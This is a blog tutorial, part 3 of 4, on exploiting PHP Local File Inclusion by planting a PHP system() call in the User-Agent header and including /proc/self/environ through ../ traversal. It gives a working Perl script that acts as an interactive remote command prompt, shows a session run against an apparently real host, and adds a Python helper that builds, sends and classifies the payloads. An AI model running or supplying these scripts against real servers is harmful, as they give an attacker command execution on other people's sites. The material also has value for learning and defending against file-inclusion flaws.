Thursday, September 29, 2011

Local File Inclusion Tutorial Part 3 of 4

LFI Technique

When Apache serves a request for a PHP page in the CGI model (php-cgi, suexec and friends), it forks a new process and execs the php binary to actually run/interpret the script. As on every *nix system, each running process has its own entry under /proc, and that entry is quite useful to us because it exposes a lot of information about the process and the environment it is running in. One caveat up front: /proc/self/environ holds the environment the process was started with (the envp handed to execve), so the request headers only end up there when PHP is spawned per request. Under mod_php, where the interpreter lives inside the long-running httpd worker, you get httpd's own environment instead and this trick does not apply.

More specifically, /proc/self/environ of a running PHP process contains something like this. The entries are NUL-separated (rendered as \0 below), and this fragment starts part-way through the HTTP_USER_AGENT value:
(X11; U; Linux i686; en-US; rv: Gecko/20061201 Firefox/ Gentoo\0HTTP_KEEP_ALIVE=300\0
That "Gentoo" is actually part of my browser's User-Agent string: Apache hands every request header to the CGI process as an HTTP_* environment variable, so whatever we send in the header arrives in /proc/self/environ unchanged. So guess what...
Imagine that we change the browser's User-Agent to a short PHP tag that calls system(), and then request the vulnerable page with the included file pointed at /proc/self/environ via ../ traversal.
You guessed right, it works: include() parses the environ contents as PHP, and the system() call is actually executed.

So, after coding this little perl script (the PHP tag in the User-Agent and the end of the loop were lost in the original post's HTML and are reconstructed here; the "jcfs" markers delimit the command output so it can be cut out of the page):
#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];   # the vulnerable URL up to the included-file parameter, e.g. .../index.php?page=
my ($line, $response);
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

print "jcfsprompt: ";
while ( $line = <STDIN> ) {
    chomp $line;
    # PHP tag sent as the User-Agent; stderr is folded into stdout so errors come back too
    $browser->agent("jcfs<?php system(\"$line 2>/dev/stdout\"); ?>jcfs");
    $response = $browser->get($url);
    # everything between the two markers is the command's output
    if ($response->content =~ /jcfs(.*)jcfs/s) {
        print $1;
    }
    print "jcfsprompt: ";
}
I tried something like this...

jcfs@heaven ~/boxes $ perl
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
jcfsprompt: pwd
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin
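An added check, not part of the original post: a small Python helper that builds the traversal URL and User-Agent payload the script above sends, parses an environ dump into its NUL-separated KEY=VALUE records, cuts the command output out from between the jcfs markers, and tells apart the outcomes you actually run into on a target (code executed; the PHP tag echoed back because the page reads the file instead of include()-ing it; environ readable but without HTTP_* variables because PHP is not spawned per request; or no environ at all). The sample responses are constructed, the hostnames are placeholders, and run_command only touches the network when you call it.

```python
import re
import urllib.request

MARK = "jcfs"   # delimiter around the command output, same as in the Perl script


def build_url(base_url, depth=24):
    """base_url is the vulnerable parameter up to '=' (assumed, e.g. http://host/index.php?page=)."""
    return base_url + "../" * depth + "proc/self/environ"


def build_user_agent(cmd, mark=MARK):
    """PHP tag sent as User-Agent; stderr is folded into stdout so errors come back too."""
    return f'{mark}<?php system("{cmd} 2>/dev/stdout"); ?>{mark}'


_KEY = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def parse_environ(blob):
    """Split a /proc/<pid>/environ dump (NUL-separated KEY=VALUE records) into a dict.
    Records without a valid variable name are ignored, so an HTML error page yields {}."""
    env = {}
    for rec in blob.split(b"\x00"):
        if b"=" not in rec:
            continue
        key, val = rec.split(b"=", 1)
        key = key.decode("latin-1")
        if _KEY.match(key):
            env[key] = val.decode("latin-1")
    return env


def extract_output(body, mark=MARK):
    """Text between the first pair of marks in the response body, or None."""
    m = re.search(re.escape(mark) + r"(.*?)" + re.escape(mark), body.decode("latin-1"), re.S)
    return m.group(1) if m else None


def classify_response(body, mark=MARK):
    """Outcome of one request: executed, reflected, no-headers, no-environ or headers-only."""
    out = extract_output(body, mark)
    if out is not None:
        # the tag itself came back: the page reads the file (readfile/file_get_contents)
        # but does not include() it, so nothing was executed
        return "reflected" if "<?" in out else "executed"
    env = parse_environ(body)
    if not env:
        return "no-environ"   # wrong traversal depth, a filter, open_basedir, or /proc not readable
    if not any(k.startswith("HTTP_") for k in env):
        return "no-headers"   # httpd's own environment: PHP is not a per-request CGI process (mod_php)
    return "headers-only"     # request headers are there but our marker never arrived


def run_command(base_url, cmd, timeout=10):
    """Send one request and return (classification, output). Network access only when called."""
    req = urllib.request.Request(build_url(base_url),
                                 headers={"User-Agent": build_user_agent(cmd)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read()
    return classify_response(body), extract_output(body)


# Constructed sample responses (not captured from any real target):
SAMPLE_EXECUTED = (b"PATH=/usr/local/bin:/usr/bin\x00SERVER_SOFTWARE=Apache\x00"
                   b"HTTP_HOST=www.example.test\x00"
                   b"HTTP_USER_AGENT=jcfsuid=32004(fastfr00) gid=32005(fastfr00)\njcfs\x00"
                   b"HTTP_KEEP_ALIVE=300\x00")
SAMPLE_REFLECTED = (b"HTTP_USER_AGENT=" + build_user_agent("id").encode()
                    + b"\x00HTTP_KEEP_ALIVE=300\x00")
SAMPLE_MOD_PHP = b"PATH=/usr/bin:/bin\x00LANG=C\x00PWD=/\x00"
SAMPLE_ERROR = b"<html><body>Warning: include(): failed to open stream</body></html>"

if __name__ == "__main__":
    for name, body in [("executed", SAMPLE_EXECUTED), ("reflected", SAMPLE_REFLECTED),
                       ("mod_php", SAMPLE_MOD_PHP), ("error", SAMPLE_ERROR)]:
        print(name, "->", classify_response(body), repr(extract_output(body)))
```

The "no-headers" branch is the one worth remembering: a readable environ that shows only PATH, LANG and similar variables means the include() is real but PHP is running inside httpd, so you need a different file to poison (log files, sessions, upload temp files) rather than a different payload.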

